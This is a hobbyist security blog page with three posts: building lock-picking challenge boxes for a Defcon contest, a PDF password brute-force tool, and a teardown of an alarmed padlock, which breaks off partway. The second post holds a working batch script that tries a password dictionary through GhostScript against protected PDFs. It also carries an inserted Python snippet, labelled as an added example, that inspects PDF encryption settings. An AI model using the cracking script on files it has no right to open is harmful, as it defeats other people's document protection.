Scripts and Picks<br />
<br />
A very brief guide to making a challenge lockbox<br />
Posted 2017-06-20<br />
<br />
I had a couple of requests to document the build process I use for making lockboxes. This year I made new challenge boxes for dcdarknet at defcon 25.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFyYBelOxOVOuGQybUHX6EUzxv3XpXXL0uWMxkbXy5fqPx3e3AUUCtf5N3gamG46xyFFW1SFqBbB8PHmcdVTBxI_Gp95Bt4Pd3OfQvMU385ZmIaLJsYa8_EWlew0-UhKVDm34sHKtRJGg/s1600/Tyl9bYv.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="900" data-original-width="1600" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFyYBelOxOVOuGQybUHX6EUzxv3XpXXL0uWMxkbXy5fqPx3e3AUUCtf5N3gamG46xyFFW1SFqBbB8PHmcdVTBxI_Gp95Bt4Pd3OfQvMU385ZmIaLJsYa8_EWlew0-UhKVDm34sHKtRJGg/s320/Tyl9bYv.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The Neapolitan Trio</td></tr>
</tbody></table>
<br />
Here's the previous version:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFPc8Wgp-OVagHMin8npec46Bs5KwxY9bmzOWF1J0zwVpiCzmacfQ7lpbxzCCF9BKPtsT-saWmKME0WN_uvjgf7_PuykFpsTyprVXckqiwX6o211HaGpK0-_d2lV_iuI0J7qU2oHaHeLk/s1600/0.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="416" data-original-width="594" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFPc8Wgp-OVagHMin8npec46Bs5KwxY9bmzOWF1J0zwVpiCzmacfQ7lpbxzCCF9BKPtsT-saWmKME0WN_uvjgf7_PuykFpsTyprVXckqiwX6o211HaGpK0-_d2lV_iuI0J7qU2oHaHeLk/s320/0.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">"Lockbox 1"</td></tr>
</tbody></table>
<br />
Here's the very first one I ever made:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRMBgFOhWG5NRnkaMRgUBxhW4Ad8xXSJ4WaqIHtnTaYARyVN0XYMzmY7sPkU87MCAxor3ll-lPIjgutHq48vh2cBP_VSdwxC-cgPi8vxfVuo-5a35tH___yZLizn3IzqlSvs-OY5JIFdI/s1600/BQX5CBFCEAAW_Mm.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="804" data-original-width="599" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRMBgFOhWG5NRnkaMRgUBxhW4Ad8xXSJ4WaqIHtnTaYARyVN0XYMzmY7sPkU87MCAxor3ll-lPIjgutHq48vh2cBP_VSdwxC-cgPi8vxfVuo-5a35tH___yZLizn3IzqlSvs-OY5JIFdI/s320/BQX5CBFCEAAW_Mm.jpg" width="238" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">"The Rook"</td></tr>
</tbody></table>
<br />
It's been a long process of create, test, (fail), revise. The original challenge I built, The Rook, was very visually pleasing, but the mounting equipment I cobbled together was not sufficient to handle several hundred people wrenching on it all day for the entirety of defcon 21 (?). Several of the locks became loose, and all you needed to do was grab the housing and twist to activate the scoring mechanism. There was no way to open it to service the locks or the other internals without destroying it. All in all it was a good learning experience, but completely illogical for long term use.<br />
<br />
The second edition, Lockbox 1, had several good revisions. You could open it to service it, the locks were removable, and it could be much more easily transported. It still had the issue of locks spinning after hundreds of people applied tension to them, though. No matter how hard we tightened the nuts down on the locks, they would eventually work loose. The scoring mechanism was very simple: the positive wire was secured to the lock on the cam screw, and the negative wire was attached to a screw that the cam would contact when the lock was picked. That idea didn't hold up very well either; the wires came loose often and caused problems, not to mention just failing from the repeated wear and tear of flexing. The display had exposed connections that would get shorted out if anything conductive was run across them, such as keys or someone's lockpicks. The battery was accessible, but you had to open the box for maintenance and it was a hassle.<br />
<br />
The newest version is the culmination of all the lessons I've learned on how not to do things.<br />
<br />
So that's a short(ish) history of the lockboxes. Here's a brief rundown on some of the techniques and mounting hardware I use. I can't go into too much depth, as these are the new versions that will be in use this year, and hopefully for about the next 3 years.<br />
<br />
First things first: plan out your entire layout and make sure everything will fit in the area you have available. Do I do that? No. Does it bite me in the ass every single build? Oh yeah, multiple times. The pictures below are from a testing board I used while building this year's boxes, so ignore all the extra holes, half and half stain job, etc.<br />
<br />
I usually use pin tumbler mortise cylinders and then some wafer locks and padlocks as these are the three most common locks people run into on a regular basis.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfigPvk3XEfp_tOFrIclDtzPc1bTH0AnT3MPQlbEe5Srf8mAIfd5OO39BQbUjxCd3ucBX75-NyaE90VZ9tBpexHv9aPe6duHPz0Gv3iNdj8WcevQtHIK92_hnqBK9gngdl0KWzGKrDCE8/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="978" data-original-width="507" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfigPvk3XEfp_tOFrIclDtzPc1bTH0AnT3MPQlbEe5Srf8mAIfd5OO39BQbUjxCd3ucBX75-NyaE90VZ9tBpexHv9aPe6duHPz0Gv3iNdj8WcevQtHIK92_hnqBK9gngdl0KWzGKrDCE8/s640/1.png" width="328" /></a></div>
<br />
A 1 3/16 inch hole saw is perfect for cutting holes for cylinder locks. The 3/4 inch hole saw works well for most cabinet style wafer and tubular locks. When planning the locations, make one pilot hole directly in the center of where the lock is supposed to go. This ensures you're centered no matter which side of the board you're working on.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil8K0K51lu-I5YeMe46ngEz3GItCwXy7m00o1MRrUA9kdK2f61WF3K6te1HXiyWRmzfOGZZ6Hi9N3VZtZOI8Vrq6w64Pcjncr7QfrS2RovPJYpjlr24ExDH8zMqneTChLpSrhnsWfKP_k/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="790" data-original-width="451" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil8K0K51lu-I5YeMe46ngEz3GItCwXy7m00o1MRrUA9kdK2f61WF3K6te1HXiyWRmzfOGZZ6Hi9N3VZtZOI8Vrq6w64Pcjncr7QfrS2RovPJYpjlr24ExDH8zMqneTChLpSrhnsWfKP_k/s320/2.png" width="182" /></a></div>
Next I drill a relief on the back side for all the cylinder locks. Why do I do that? Well, remember the issues with locks spinning loose? We made a solution for that.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcewFcA7bJP5zDVnMVGx0qmbhnaIOVNzq8-y-gUKyGh0QCwXrKti7mzQg3V0QKhkeenS3QNRsjYMnGglQCL8AUFdi8sOyufvHOs5Co9uB0trRyX_ScMphxf1SUYtLCbgEsOxgBs4mXK9E/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="464" data-original-width="475" height="311" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcewFcA7bJP5zDVnMVGx0qmbhnaIOVNzq8-y-gUKyGh0QCwXrKti7mzQg3V0QKhkeenS3QNRsjYMnGglQCL8AUFdi8sOyufvHOs5Co9uB0trRyX_ScMphxf1SUYtLCbgEsOxgBs4mXK9E/s320/3.png" width="320" /></a></div>
Say hello to my little friend, the StopSpin (trademark, patent pending, etc). I worked with my friend and fellow dcdarknet contest agent Bunni to develop these lovely little helpers.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKZ7lYhj0BTwWQaGK61wq5TrkPoksPoz-6kvV-410JYVd1VWuSg9E65JZ2upeGqirAR5TZeQFNvg3JwsZDWXqhi37WDk4jOC-Ve2-CVGfrLx9zTTpTS5otsZPShZ68_Cu9CIRxn0R4OI0/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="516" data-original-width="520" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKZ7lYhj0BTwWQaGK61wq5TrkPoksPoz-6kvV-410JYVd1VWuSg9E65JZ2upeGqirAR5TZeQFNvg3JwsZDWXqhi37WDk4jOC-Ve2-CVGfrLx9zTTpTS5otsZPShZ68_Cu9CIRxn0R4OI0/s320/4.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The tabs on the StopSpin interact with the grooves on the lock to stop it from spinning once it's screwed down onto the board.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaBvg0RjDdobnpeSKpBDfC6yBrKzg94vdwtZcycC6GPGryIk31_xwuTSFu4w_KYUctEG3gzCOKtC6Py9qFN2jfUZB1GmVsxDRRvoqvaKn9FcvX_fOTrVrEfxzCIw3YNm7rdqz_S-EI9WM/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="504" data-original-width="491" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaBvg0RjDdobnpeSKpBDfC6yBrKzg94vdwtZcycC6GPGryIk31_xwuTSFu4w_KYUctEG3gzCOKtC6Py9qFN2jfUZB1GmVsxDRRvoqvaKn9FcvX_fOTrVrEfxzCIw3YNm7rdqz_S-EI9WM/s320/7.png" width="311" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This allows us to swap out locks by just removing the nut and popping the lock out. No need to apply the strength of the gods to tighten the nut down; the lock can't spin loose, so all the nut needs to do is stop the lock from falling out of the mounting hole.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1fAi-5PGbI67wBIWsaTV_IpXrfsTOSXjE2TAIMlI_UU5AtK0pYK0Xj0W3aKo6Enp9GhBRh6APpj-0ZItePA_rlBpzx67kGkVh5jheLIaJhn9M-OeBVMmgOwYrhMR_GqCM949tktwlJao/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="405" data-original-width="433" height="299" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1fAi-5PGbI67wBIWsaTV_IpXrfsTOSXjE2TAIMlI_UU5AtK0pYK0Xj0W3aKo6Enp9GhBRh6APpj-0ZItePA_rlBpzx67kGkVh5jheLIaJhn9M-OeBVMmgOwYrhMR_GqCM949tktwlJao/s320/9.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizmDfCl8bn9Wh3TgBZvef_jevNKStKzsTh8qPJ75PFu-ueaCpm6o6OAY8nR2axnsq-qZ8uLkcBprdHiPNyrALsheyZea7zD4vPXoECM-HhhLxyN9PFFEk5bAkSu0b7b0ISjkSQS0caL2c/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="312" data-original-width="329" height="303" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizmDfCl8bn9Wh3TgBZvef_jevNKStKzsTh8qPJ75PFu-ueaCpm6o6OAY8nR2axnsq-qZ8uLkcBprdHiPNyrALsheyZea7zD4vPXoECM-HhhLxyN9PFFEk5bAkSu0b7b0ISjkSQS0caL2c/s320/10.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
It's the most efficient mounting method I've found. I've seen, and tried myself, most of the mounting methods documented on lockpicking101 and various other sites. Nothing else I've tried is as easy to mount and swap out locks on a board.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj66vwJCYMqQEdjvW3I4zXebBrvF8_THYmpk4Z_m6XlZ7HskDbtXK2HB7Yj-POUycXwmUgZF8d8qX_9FnhUS6LhaGUPGIeDQVGueLk7M96F-qNu12RPhCwy6lZbh3FL5-R8lSAtR80bbys/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="416" data-original-width="471" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj66vwJCYMqQEdjvW3I4zXebBrvF8_THYmpk4Z_m6XlZ7HskDbtXK2HB7Yj-POUycXwmUgZF8d8qX_9FnhUS6LhaGUPGIeDQVGueLk7M96F-qNu12RPhCwy6lZbh3FL5-R8lSAtR80bbys/s320/11.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYuHMDQi50hX_O0KQoJ3_-IkVdQ8GF2bc0FwzNJRYjbsq2qfhtOMjNB-khd1NF7JFHZOqbM6GGtzv78g0kBzfld0wnkJugqJR5HT_Ifz6l85gPE7HmEiXG1nsszCzr-LstdzQNLOTTzls/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="433" data-original-width="376" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYuHMDQi50hX_O0KQoJ3_-IkVdQ8GF2bc0FwzNJRYjbsq2qfhtOMjNB-khd1NF7JFHZOqbM6GGtzv78g0kBzfld0wnkJugqJR5HT_Ifz6l85gPE7HmEiXG1nsszCzr-LstdzQNLOTTzls/s320/12.png" width="277" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
For the other locks I just use the included anti-spin holders that interact with the flat sides of the lock body.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidOaWL5LBA3BRfLf80gh7iA-Hfya10ZGttGWlLdE9Y8dD0a8syhrxApNmKqn2p9akM4VAqvYKTRGTrThp1M5OLED8oynBG_eamz9BQaEXZ3UM9mvhMyYvfGMn-Ovn-ImzSiJFjWGFV_rs/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="374" data-original-width="520" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidOaWL5LBA3BRfLf80gh7iA-Hfya10ZGttGWlLdE9Y8dD0a8syhrxApNmKqn2p9akM4VAqvYKTRGTrThp1M5OLED8oynBG_eamz9BQaEXZ3UM9mvhMyYvfGMn-Ovn-ImzSiJFjWGFV_rs/s320/14.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjah74LFIIp5V3vu-oBh4WXaliWyPyobrGC6H6BFri8aWSTajjZrVzO5RfstnQPpuS50liKZHkGmFh0aMI-9Bp8wDMNy_dRJU7iUjRIEzDbzogUEJFlgaj_yM0HbJ0z-yPP_S4ugYqcJqo/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="527" data-original-width="461" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjah74LFIIp5V3vu-oBh4WXaliWyPyobrGC6H6BFri8aWSTajjZrVzO5RfstnQPpuS50liKZHkGmFh0aMI-9Bp8wDMNy_dRJU7iUjRIEzDbzogUEJFlgaj_yM0HbJ0z-yPP_S4ugYqcJqo/s320/15.png" width="279" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Make sure to align your movement restriction washers properly so the locks turn the correct way. This also creates an added difficulty because the people trying to pick them don't know which way to tension the lock.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUCDg54ce5ViWIF1GI37Oh3QIKM26G2qRtiqjoidJx7IBfOx3Z-q3CF22A_GMV3dGRHBda2skNP6jRx-RWa5vhjxBGijRK24SiIC-B9XRas7zLHNMdZuUKUPOZf2fCY9YY1k2LqQXcV6Q/s1600/16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="736" data-original-width="596" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUCDg54ce5ViWIF1GI37Oh3QIKM26G2qRtiqjoidJx7IBfOx3Z-q3CF22A_GMV3dGRHBda2skNP6jRx-RWa5vhjxBGijRK24SiIC-B9XRas7zLHNMdZuUKUPOZf2fCY9YY1k2LqQXcV6Q/s320/16.png" width="259" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg41G4lO2hiZ_AsSdmxlR_qk_EWfPlv5EiWGzWgv7ygNSDoTePpgPJ-mIES6Q0Fc1JSDXjBuNq-vfUu9qNfIKxQrkgAAnifzY8e2uClXcd4YXbmqV1A4tdGcANk9gKD-IcyAjVC8w-ogZ0/s1600/17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="668" data-original-width="583" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg41G4lO2hiZ_AsSdmxlR_qk_EWfPlv5EiWGzWgv7ygNSDoTePpgPJ-mIES6Q0Fc1JSDXjBuNq-vfUu9qNfIKxQrkgAAnifzY8e2uClXcd4YXbmqV1A4tdGcANk9gKD-IcyAjVC8w-ogZ0/s320/17.png" width="279" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
This gives you a nice flush mounting on the face of your board, stops the locks from spinning, and makes swapping out locks quick and easy.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfeJTxgVu1lg2Jwd6vRsJVpzXV1LgLGL8Vlz3frT1B_yuTZbWp3uBJlMN8i8nEbMVCQD5lYvZgF7UBsHcWylDeLSYRwEzUK_s_1J0SFCjZDwyWoQWPImRUF484ZK2OpstgJC1yy5KVY8U/s1600/19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="503" data-original-width="404" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfeJTxgVu1lg2Jwd6vRsJVpzXV1LgLGL8Vlz3frT1B_yuTZbWp3uBJlMN8i8nEbMVCQD5lYvZgF7UBsHcWylDeLSYRwEzUK_s_1J0SFCjZDwyWoQWPImRUF484ZK2OpstgJC1yy5KVY8U/s320/19.png" width="257" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjKRFosNiz-BlrCGAIc17TdRbvqzxr_a6QfTzKxFiXe2p0Tl2Zf-J7xGh9idqxtfBSNq2smjgC18IRpPgx1GGfEb5KKkHnyIs284avCzjXM5S6x2OOGcqROsaXy02PfbEgkmVh7cnMPhk/s1600/18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="506" data-original-width="958" height="169" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjKRFosNiz-BlrCGAIc17TdRbvqzxr_a6QfTzKxFiXe2p0Tl2Zf-J7xGh9idqxtfBSNq2smjgC18IRpPgx1GGfEb5KKkHnyIs284avCzjXM5S6x2OOGcqROsaXy02PfbEgkmVh7cnMPhk/s320/18.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I routered the bottom edge of the boards so that they sit low enough in the ammo boxes that the lid doesn't come into contact with them when closed. The ammo boxes are just regular Bunker Hill boxes from Harbor Freight. You can pick them up for ~$4 if you get them on sale with a coupon, which they pretty much always are.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7ARBoxQZWTNAgf9e-aBfTP5k_Zia6kNyMHAbxkjaKhDjnNVUfh3z3m3DmRPeWsbBQzjgq3_menm6QfqwxfsFSNaETiHjjee2GmKDaxjKeNKvXrErJIQRkyjtRabXIumfaGL1fCzPWi90/s1600/20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="670" data-original-width="707" height="303" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7ARBoxQZWTNAgf9e-aBfTP5k_Zia6kNyMHAbxkjaKhDjnNVUfh3z3m3DmRPeWsbBQzjgq3_menm6QfqwxfsFSNaETiHjjee2GmKDaxjKeNKvXrErJIQRkyjtRabXIumfaGL1fCzPWi90/s320/20.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
The rest of the build is all confidential info, but this should give you enough information to plan and make your own practice stands/holders/challenge boxes.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
All the software and circuit boards are handled by Bunni; he's the real brains behind these as far as making them do what they do. I'm just a monkey with a wood shop.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
So if you happen to be at Defcon this year, come on down and join the dcdarknet contest (shameless plug) and give these lockboxes a spin. Let me know what you like about them, how you think they could be better, what kind of different locks you'd like to see, etc. I keep a bucket nearby to catch the tears of those who are defeated by the locks.</div>
<br />
Simple PDF Brute Force Tool using GhostScript 9.09<br />
Posted 2016-07-11<br />
<br />
I've had to deal with a lot of PDFs lately that come in either Secured (cannot copy, cannot print) or Password Protected (requires password to open).<br />
<br />
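The "Secured" restrictions are flags in the /P entry of the file's /Encrypt dictionary, next to the cipher the file uses. The following is an added example, not code from the original post: it reads that dictionary and reports the cipher and the denied actions. The sample PDFs are constructed fragments, the function names are made up here, and it assumes the dictionary is stored as an uncompressed indirect object; it does not tell you whether an open password is set.<br />

```python
import re

# Permission bits of the /P entry (standard security handler). Bit numbers are
# 1-based as in the PDF specification; a set bit means the action is allowed.
PERMISSION_BITS = {
    3: "print",
    4: "modify",
    5: "copy/extract",
    6: "annotate",
    9: "fill forms",
    10: "extract for accessibility",
    11: "assemble",
    12: "print high quality",
}


def find_encrypt_dict(pdf):
    """Return the body of the /Encrypt dictionary object, or None if not found."""
    ref = re.search(rb"/Encrypt\s+(\d+)\s+(\d+)\s+R", pdf)
    if not ref:
        return None
    # Locate "N G obj << ... >> endobj"; matching up to endobj keeps nested
    # crypt-filter dictionaries inside the captured body.
    pattern = (rb"(?<!\d)" + ref.group(1) + rb"\s+" + ref.group(2)
               + rb"\s+obj\s*<<(.*?)>>\s*endobj")
    obj = re.search(pattern, pdf, re.S)
    return obj.group(1) if obj else None


def int_entry(d, key, default):
    """Read an integer entry such as /R 3 or /P -2072 from a dictionary body."""
    m = re.search(rb"/" + key + rb"\s+(-?\d+)", d)
    return int(m.group(1)) if m else default


def describe_cipher(d):
    v = int_entry(d, b"V", 0)
    if v == 1:
        return "RC4 40-bit"
    if v == 2:
        return "RC4 %d-bit" % int_entry(d, b"Length", 40)
    # /V 4 and 5 name the cipher in a crypt filter (/CFM entry).
    cfm = re.search(rb"/CFM\s*/(\w+)", d)
    names = {b"V2": "RC4", b"AESV2": "AES-128", b"AESV3": "AES-256"}
    return names.get(cfm.group(1), "unknown") if cfm else "unknown"


def audit(pdf):
    """Summarise how a PDF is protected, from its /Encrypt dictionary."""
    if b"/Encrypt" not in pdf:
        return {"encrypted": False}
    d = find_encrypt_dict(pdf)
    if d is None:
        raise ValueError("/Encrypt present but its dictionary was not found")
    revision = int_entry(d, b"R", 0)
    p = int_entry(d, b"P", 0) & 0xFFFFFFFF  # /P is a signed 32-bit value
    # Revision 2 only defines bits 3-6; the higher bits arrived with revision 3.
    denied = [name for bit, name in PERMISSION_BITS.items()
              if (revision >= 3 or bit <= 6) and not p & (1 << (bit - 1))]
    handler = re.search(rb"/Filter\s*/(\w+)", d)
    return {
        "encrypted": True,
        "handler": handler.group(1).decode() if handler else "unknown",
        "cipher": describe_cipher(d),
        "revision": revision,
        "denied": denied,
    }


# Constructed sample fragments (not real documents): only the parts read above.
SAMPLE_PLAIN = b"%PDF-1.4\ntrailer\n<< /Size 3 /Root 1 0 R >>\n"
SAMPLE_RC4 = (
    b"%PDF-1.4\n"
    b"7 0 obj\n<< /Filter /Standard /V 2 /R 3 /Length 128 /P -2072\n"
    b"/O <" + b"00" * 32 + b"> /U <" + b"00" * 32 + b"> >>\nendobj\n"
    b"trailer\n<< /Size 8 /Root 1 0 R /Encrypt 7 0 R /ID [<00><00>] >>\n"
)
SAMPLE_AES = (
    b"%PDF-1.6\n"
    b"9 0 obj\n<< /Filter /Standard /V 4 /R 4 /Length 128\n"
    b"/CF << /StdCF << /CFM /AESV2 /AuthEvent /DocOpen /Length 16 >> >>\n"
    b"/StmF /StdCF /StrF /StdCF /P -3904 >>\nendobj\n"
    b"trailer\n<< /Size 10 /Root 1 0 R /Encrypt 9 0 R /ID [<00><00>] >>\n"
)

if __name__ == "__main__":
    for label, sample in (("plain", SAMPLE_PLAIN), ("rc4", SAMPLE_RC4),
                          ("aes", SAMPLE_AES)):
        print(label, audit(sample))
```
<br />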
Using GhostScript you can make a simple brute force tool to attack these password protected PDFs.<br />
<br />
I'm well aware there are commercial options for doing this, but I don't like to pay money for something I can figure out myself. My method is not as fast or feature rich, but it can get the job done.<br />
<br />
You'll need to install GhostScript. I used revision 9.09; if you're using a newer or older version, adjust the executable paths in the script below accordingly.<br />
<br />
You'll also need a dictionary file (%userprofile%\desktop\passwords.txt) <- adjust accordingly.<br />
<br />
With the way this script is written, you can simply drag and drop the PDF file onto the batch file icon, or pass it as an argument, e.g.: bruteforce.bat Path.to.PDF.pdf<br />
<br />
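@echo off<br />
rem No delayed expansion: it would mangle passwords that contain "!"<br />
setlocal<br />
Title Performing Magic, please wait...<br />
rem usebackq lets the dictionary path be quoted in case it contains spaces<br />
for /f "usebackq tokens=* delims=" %%a in ("%userprofile%\desktop\passwords.txt") do (<br />
echo Trying password: %%a<br />
rem -dBATCH -dNOPAUSE -sDEVICE=nullpage: process the file without rendering or prompting, then exit<br />
"C:\Program Files (x86)\gs\gs9.09\bin\gswin32c.exe" -q -dBATCH -dNOPAUSE -sDEVICE=nullpage "-sPDFPassword=%%a" "%~1"<br />
rem errorlevel 0 means GhostScript opened the file, so stop at the first hit<br />
if not errorlevel 1 (echo Password is %%a & goto :done)<br />
cls<br />
)<br />
echo password not found<br />
:done<br />
pause<br />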
exit<br />
<br />
Z-Con Lock Teardown<br />
Posted 2015-12-17<br />
<br />
I got this lock a while ago for two reasons: it's an alarmed padlock, and it has a funky key.<br />
Since then it's been hanging out in a display case.<br />
<br />
Here's the tear down.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSZzPvpbZ6ZRzJt9FWQ-cAY7Q3Kqg8MLjsiGMvYQD7bZjwgKKmuMWJz7OWrg2pTWnj51ydRmylXjSX4yf-bhHc2JRYK4Q3rXWJEl3Hd-pk1BEu70-cHAV09wJuppd-x6fZe5RR4fVRNEY/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSZzPvpbZ6ZRzJt9FWQ-cAY7Q3Kqg8MLjsiGMvYQD7bZjwgKKmuMWJz7OWrg2pTWnj51ydRmylXjSX4yf-bhHc2JRYK4Q3rXWJEl3Hd-pk1BEu70-cHAV09wJuppd-x6fZe5RR4fVRNEY/s320/1.png" width="180" /></a></div>
This is the lock I got with a Z-Con Lock core. I believe that Z-Con makes the cores then sells them to manufacturers to use in their own locks. It's a reasonably well designed lock; I could not find any exploitable design flaws in the body of the lock that would allow me to unlock it. Disabling the audio alarm is a different story. It has a dual ball bearing locking mechanism, so shimming is out of the question, a solid metal exterior, and a hardened shackle.<br />
<br />
Here's the bottom of the lock:<br />
<div class="separator" style="clear: both; text-align: center;">
